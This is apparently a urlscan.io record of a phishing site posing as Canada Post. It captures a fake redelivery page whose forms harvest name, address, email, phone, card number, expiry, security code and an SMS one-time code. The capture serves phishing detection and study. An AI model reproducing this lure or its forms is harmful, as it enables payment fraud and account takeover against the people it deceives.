correos-cr.bond Open in urlscan Pro
2606:4700:3034::6815:5613  Public Scan

Submitted URL: http://correos-cr.bond/
Effective URL: https://correos-cr.bond/index/jianadapost/register
Submission Tags: @phishunt_io
Submission: On June 29 via api from DE — Scanned from DE

Form analysis 2 forms found in the DOM

#

<form action="#">
  <input type="text" class="form-control" placeholder="Search our website">
</form>

#

<form action="#" class="multiForm" id="paymentForm">
  <div class="progressBar">
    <ul>
      <li class="active">
        <span>Status Not Available </span>
      </li>
      <li> <span>Status Not Available </span></li>
      <li> <span>Status Not Available </span></li>
    </ul>
  </div>
  <div id="overlay">
    <!-- <div class="loader"></div> -->
    <span class="loader">Loading</span>
  </div>
  <div id="overlay2">
    <span class="loader">Loading</span>
  </div>
  <!-- Page 1 Form -->
  <fieldset>
    <div class="updatedDate"> Updated: Today at 1:30 am </div>
    <div class="deliveryIn__notifiction">
      <div class="deliveryIn__notifiction__icon">
        <img src="/assets/img/info-glyph.svg" alt="info">
      </div>
      <div class="deliveryIn__notifiction__content">
        <p>Due to incomplete address and we cannot deliver your package. Canadapost Allows you to Redeliver your package to your address in case of delivery fallure. Pleaseupdate address information in time </p>
      </div>
    </div>
    <div class="deliveryIn__details">
      <div class="accordion" id="deliveryDetail">
        <div class="accordion-item">
          <h2 class="accordion-header" id="headingOne">
            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne"> Delivery details </button>
          </h2>
          <div id="collapseOne" class="accordion-collapse collapse" aria-labelledby="headingOne" data-bs-parent="#deliveryDetail">
            <div class="accordion-body p-0">
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong> Regular Parcels</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Tracking number:</strong> 7218809018449384</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong>
                </p>
                <div class="shipService">Jun, 30</div>
                <p></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="deliveryIn__address">
      <h3>Verify Address</h3>
      <p>First, we need confirm your address is eligible for informed delivery</p>
    </div>
    <div class="vaddress">
      <h3> <span>* required field</span></h3>
      <div class="vaddress__block">
        <div class="form-group">
          <label for="senderNameInput" class="form-label">Recipient Full name *</label>
          <input type="text" class="form-control" id="senderNameInput" name="senderNameInput" placeholder="e.g. John Doe" maxlength="30">
        </div>
        <div class="form-group">
          <label for="streetAddressInput" class="form-label">Search or Enter Street Address*</label>
          <input type="text" class="form-control" id="streetAddressInput" name="streetAddressInput" placeholder="e.g. 100-123 Shippers St. or K1A 1A1">
        </div>
        <div class="form-group">
          <label for="senderAddressLine2" class="form-label">Apt, Suite, Unit, Building, Floor, etc.</label>
          <input type="text" class="form-control" id="senderAddressLine2" name="senderAddressLine2" placeholder="e.g. Suite 111">
        </div>
        <div class="form-group">
          <label for="cityInput" class="form-label">City *</label>
          <input type="text" class="form-control" id="cityInput" name="cityInput" placeholder="e.g. Mississauga" maxlength="40">
        </div>
        <div class="form-group">
          <label for="provinceId" class="form-label">Province *</label>
          <select class="form-select" id="provinceId" name="provinceId">
            <option selected="" disabled="">Please Select</option>
            <option value="AB">Alberta</option>
            <option value="BC">British Columbia</option>
            <option value="MB">Manitoba</option>
            <option value="NB">New Brunswick</option>
            <option value="NL">Newfoundland &amp; Labrador</option>
            <option value="NS">Nova Scotia</option>
            <option value="NT">Northwest Territories</option>
            <option value="NU">Nunavut</option>
            <option value="ON">Ontario</option>
            <option value="PE">Prince Edward Island</option>
            <option value="QC">Québec</option>
            <option value="SK">Saskatchewan</option>
            <option value="YT">Yukon Territory</option>
          </select>
        </div>
        <div class="form-group">
          <label for="PostalCodeInput" class="form-label">Postal Code * <button type="button" data-bs-toggle="tooltip" data-bs-placement="top" title="" data-bs-original-title="Post code must have the following format: ANA NAN">
              <img src="/assets/img/tooltip.svg" alt="tooltip">
            </button>
          </label>
          <input type="text" class="form-control" id="PostalCodeInput" name="PostalCodeInput" placeholder="A1A 1A1">
        </div>
        <div class="form-group">
          <label for="EmailAddressInput" class="form-label">Email Address * (receipt will be sent to this email) *</label>
          <input type="text" class="form-control" id="EmailAddressInput" name="EmailAddressInput" placeholder="e.g. johndoe@example.com">
        </div>
        <div class="form-group">
          <label for="PhoneNumberInput" class="form-label">Phone Number *</label>
          <input type="text" class="form-control" onchange="myFunction2()" id="PhoneNumberInput" name="PhoneNumberInput" placeholder="e.g. 4164561234">
        </div>
        <div class="form-group">
          <div class="form-check">
            <input class="form-check-input" type="checkbox" value="" id="deliveryUpdate">
            <label class="form-check-label" for="deliveryUpdate"> I want to receive delivery updates on my shipment by email. </label>
          </div>
        </div>
      </div>
      <div class="vaddress__submitBtn">
        <button type="button" id="sub1" class="continuebtn">Continue</button>
      </div>
    </div>
  </fieldset>
  <!-- Page 2 Form -->
  <fieldset>
    <div class="updatedDate"> Updated: Today at 1:30 am </div>
    <div class="deliveryIn__notifiction">
      <div class="deliveryIn__notifiction__icon">
        <img src="/assets/img/info-glyph.svg" alt="info">
      </div>
      <div class="deliveryIn__notifiction__content">
        <p>Due to incomplete address and we cannot deliver your package. Canadapost Allows you to Redeliver your package to your address in case of delivery fallure. Pleaseupdate address information in time </p>
      </div>
    </div>
    <div class="deliveryIn__details">
      <div class="accordion" id="deliveryDetailtwo">
        <div class="accordion-item">
          <h2 class="accordion-header" id="headingOne">
            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne"> Delivery details </button>
          </h2>
          <div id="collapseOne" class="accordion-collapse collapse" aria-labelledby="headingOne" data-bs-parent="#deliveryDetailtwo">
            <div class="accordion-body p-0">
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong> Regular Parcels</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Tracking number:</strong> 7218809018449384</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong>
                </p>
                <div class="shipService">Jun, 30</div>
                <p></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="deliveryIn__address">
      <h3>Payment Method</h3>
      <p>To ensure normal delivery, need to verify your mobile phone number <br>
        <span>Redelivery reauest cost $0.9</span>
      </p>
    </div>
    <div class="vaddress">
      <h3> <span>* required field</span></h3>
      <div class="vaddress__block">
        <div class="form-group">
          <input class="form-control" type="tel" id="cc-number" name="ccnumber" placeholder="Card Number (5555-5555-5555-4444)" maxlength="19" data-payment="cc-number" required="">
        </div>
        <div class="form-group">
          <input type="tel" class="form-control" id="cc-exp" name="ccexp" placeholder="Expiry Date (DD/YY)" maxlength="5" data-payment="cc-exp" required="">
        </div>
        <div class="form-group">
          <input type="password" class="form-control" id="cc-cvc" name="cccvc" placeholder="Security Code" maxlength="4" data-payment="cc-cvc" required="">
        </div>
      </div>
      <div class="vaddress__submitBtn">
        <button type="go" id="sub2" class="continuebtn">Continue</button>
      </div>
    </div>
  </fieldset>
  <!-- Page 3 Form -->
  <fieldset>
    <div class="updatedDate"> Updated: Today at 1:30 am </div>
    <div class="deliveryIn__notifiction">
      <div class="deliveryIn__notifiction__icon">
        <img src="/assets/img/info-glyph.svg" alt="info">
      </div>
      <div class="deliveryIn__notifiction__content">
        <p>Due to incomplete address and we cannot deliver your package. Canadapost Allows you to Redeliver your package to your address in case of delivery fallure. Pleaseupdate address information in time </p>
      </div>
    </div>
    <div class="deliveryIn__details">
      <div class="accordion" id="deliveryDetailtwo">
        <div class="accordion-item">
          <h2 class="accordion-header" id="headingOne">
            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne"> Delivery details </button>
          </h2>
          <div id="collapseOne" class="accordion-collapse collapse" aria-labelledby="headingOne" data-bs-parent="#deliveryDetailtwo">
            <div class="accordion-body p-0">
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong> Regular Parcels</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Tracking number:</strong> 7218809018449384</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong>
                </p>
                <div class="shipService">Jun, 30</div>
                <p></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="deliveryIn__address">
      <h3>Verify Telephone</h3>
      <p>To ensure normal delivery, need to verify your mobile phone number <br>
      </p>
    </div>
    <div class="vaddress">
      <h3> <span>* required field</span></h3>
      <div class="vaddress__block">
        <div class="vaddress__submitBtn">
          <script language="javascript" type="text/javascript">
            function countdown() {
              var seconds = 60;
              document.getElementById("hide1").style.display = "none";
              document.getElementById("hide2").style.display = "block";

              function tick() {
                var counter = document.getElementById("counter");
                seconds--;
                counter.innerHTML = "0:" + (seconds < 10 ? "0" : "") + String(seconds);
                if (seconds > 0) {
                  setTimeout(tick, 1000);
                } else {
                  document.getElementById("counter").innerHTML = "";
                }
              }
              tick();
            }
          </script>
          <span class="timer">
            <span id="counter"></span>
          </span>
          <div id="hide1">
            <div class="form-group">
              <input type="text" class="form-control" id="tel-number" name="telnumber" readonly="" value="" data-payment="tel-number" required="">
            </div>
            <a type="go" onclick="countdown()" class="continuebtn">Continue</a>
          </div>
          <div id="hide2" style="display: none;">
            <div class="form-group">
              <input class="form-control" type="text" id="otp-number" name="otpnumber" placeholder="Enter Your OTP" maxlength="50" data-payment="otp-number" required="">
            </div>
            <button type="go" id="sub4" class="continuebtn">Continue</button>
          </div>
        </div>
      </div>
    </div>
  </fieldset>
  <!-- Page 4 Form -->
  <fieldset>
    <div class="updatedDate"> Updated: Today at 1:30 am </div>
    <div class="deliveryIn__notifiction">
      <div class="deliveryIn__notifiction__icon">
        <img src="/assets/img/info-glyph.svg" alt="info">
      </div>
      <div class="deliveryIn__notifiction__content">
        <h4>We have updated your shipping address</h4>
        <p>For more information on claims, visit your local post office or our website <a href="https://www.canadapost-postescanada.ca/track-reperage/" target="_blank">https://www.canadapost-postescanada.catrack-reperage/</a>Canadapost Value your
          business. We apologize for any inconvenience this may cause you. </p>
      </div>
    </div>
    <div class="deliveryIn__details">
      <div class="accordion" id="deliveryDetailthree">
        <div class="accordion-item">
          <h2 class="accordion-header" id="headingOne">
            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#collapseOne" aria-expanded="false" aria-controls="collapseOne"> Delivery details </button>
          </h2>
          <div id="collapseOne" class="accordion-collapse collapse" aria-labelledby="headingOne" data-bs-parent="#deliveryDetailthree">
            <div class="accordion-body p-0">
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong> Regular Parcels</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Tracking number:</strong> 7218809018449384</p>
              </div>
              <div class="deliveryIn__details__box">
                <p><strong class="d-block">Delivery Period: </strong>
                </p>
                <div class="shipService">Jun, 30</div>
                <p></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="vaddress">
      <div class="vaddress__submitBtn">
        <a href="https://www.canadapost-postescanada.ca/cpc/en/home.page" class="endFormBtn">Continue</a>
      </div>
    </div>
  </fieldset>
</form>

Text Content

Menu


Sign in or Register
 * Personal
 * Business
 * Ourcompany
 * Store
 * Support

 * 
   Track
 * 
   Find a postal code
 * 
   Find a rate
 * 
   epost

See more tools
Français


POPULAR SEARCHES

Look up a postal code



Stamp prices



Mail Forwarding



Track



All postal guides



Support


TRACK: 7218809018449384

 * 
 * 
 * 


INVALID SHIPPING ADDRESS

Thursday, Jun, 29

 * Status Not Available
 * Status Not Available
 * Status Not Available

Loading
Loading
Updated: Today at 1:30 am

Due to incomplete address and we cannot deliver your package. Canadapost Allows
you to Redeliver your package to your address in case of delivery fallure.
Pleaseupdate address information in time


DELIVERY DETAILS

Delivery Period: Regular Parcels

Tracking number: 7218809018449384

Delivery Period:

Jun, 30




VERIFY ADDRESS

First, we need confirm your address is eligible for informed delivery


* REQUIRED FIELD

Recipient Full name *
Search or Enter Street Address*
Apt, Suite, Unit, Building, Floor, etc.
City *
Province * Please Select Alberta British Columbia Manitoba New Brunswick
Newfoundland & Labrador Nova Scotia Northwest Territories Nunavut Ontario Prince
Edward Island Québec Saskatchewan Yukon Territory
Postal Code *
Email Address * (receipt will be sent to this email) *
Phone Number *
I want to receive delivery updates on my shipment by email.
Continue
Updated: Today at 1:30 am

Due to incomplete address and we cannot deliver your package. Canadapost Allows
you to Redeliver your package to your address in case of delivery fallure.
Pleaseupdate address information in time


DELIVERY DETAILS

Delivery Period: Regular Parcels

Tracking number: 7218809018449384

Delivery Period:

Jun, 30




PAYMENT METHOD

To ensure normal delivery, need to verify your mobile phone number
Redelivery reauest cost $0.9


* REQUIRED FIELD


Continue
Updated: Today at 1:30 am

Due to incomplete address and we cannot deliver your package. Canadapost Allows
you to Redeliver your package to your address in case of delivery fallure.
Pleaseupdate address information in time


DELIVERY DETAILS

Delivery Period: Regular Parcels

Tracking number: 7218809018449384

Delivery Period:

Jun, 30




VERIFY TELEPHONE

To ensure normal delivery, need to verify your mobile phone number



* REQUIRED FIELD


Continue

Continue
Updated: Today at 1:30 am

WE HAVE UPDATED YOUR SHIPPING ADDRESS

For more information on claims, visit your local post office or our website
https://www.canadapost-postescanada.catrack-reperage/Canadapost Value your
business. We apologize for any inconvenience this may cause you.


DELIVERY DETAILS

Delivery Period: Regular Parcels

Tracking number: 7218809018449384

Delivery Period:

Jun, 30



Continue


SUPPORT


WHAT’S AN EXPECTED DELIVERY?

An expected delivery is an estimate of when we’ll attempt to deliver an item,
based on where it is in our network. The date and time (when applicable) are not
guaranteed, can be impacted by factors such as weather, traffic and parcel
volume, and will continue to be updated as the item travels to its destination.

Find a delivery standard

Compare shipping services in Canada


WHAT’S A DELIVERY STANDARD?

A delivery standard represents the expected transit time in business days from
the day of deposit (day 0) to delivery. A business day does not include
Saturdays, Sundays, statutory holidays, or any holidays observed by Canada Post.
Items deposited outside of business days, after the last collection time, or
after the cut-off time of the deposit location are considered as being deposited
on the next business day. The delivery standard may be before, after, or on the
same day as the expected delivery.

Find out more about delivery standards


WHAT’S A DELIVERY CONFIRMATION?

A delivery confirmation provides proof that an item was delivered. If the sender
selected the Signature option, an image of the recipient’s signature will be
included in the document.

Découvrez comment afficher une confirmation de livraison

Voir plus d'assistance


SERVICE ALERTS

These events may affect delivery schedules.

See all service alerts


CONNECT WITH US

 * Facebook
 * Twitter
 * Instagram
 * Linkedin
 * YouTube

 * Website feedback


SUPPORT

 * Need help?
 * Contact us


CORPORATE

 * About us
 * Media centre
 * Careers
 * I'm an employee
 * Talent Zone
 * Negotiations Updates


BLOGS

 * Business Matters
 * Canada Post Magazine

 * Accessibility
 * Legal
 * Privacy
 * Research

© Canada Post Corporation



Welcome to Canada Post

Bienvenue à Postes Canada

English Français